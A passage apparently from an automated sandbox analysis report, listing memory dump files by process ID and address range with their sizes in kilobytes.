                                                      • memory/3168-11493-0x000001C435BB0000-0x000001C435BBE000-memory.dmp

                                                        Filesize

                                                        56KB

                                                      • memory/3720-197-0x000002267AE00000-0x000002267AE0A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/3720-196-0x000002267B1A0000-0x000002267B1B2000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/3792-11496-0x0000016430920000-0x0000016430930000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/3792-11498-0x0000016432450000-0x0000016432460000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/3968-11485-0x00000203E39D0000-0x00000203E39E2000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/3968-11483-0x00000203E1D80000-0x00000203E1D92000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/4776-11507-0x000001AC76B00000-0x000001AC76B0F000-memory.dmp

                                                        Filesize

                                                        60KB

                                                      • memory/4776-11508-0x000001AC78630000-0x000001AC7863E000-memory.dmp

                                                        Filesize

                                                        56KB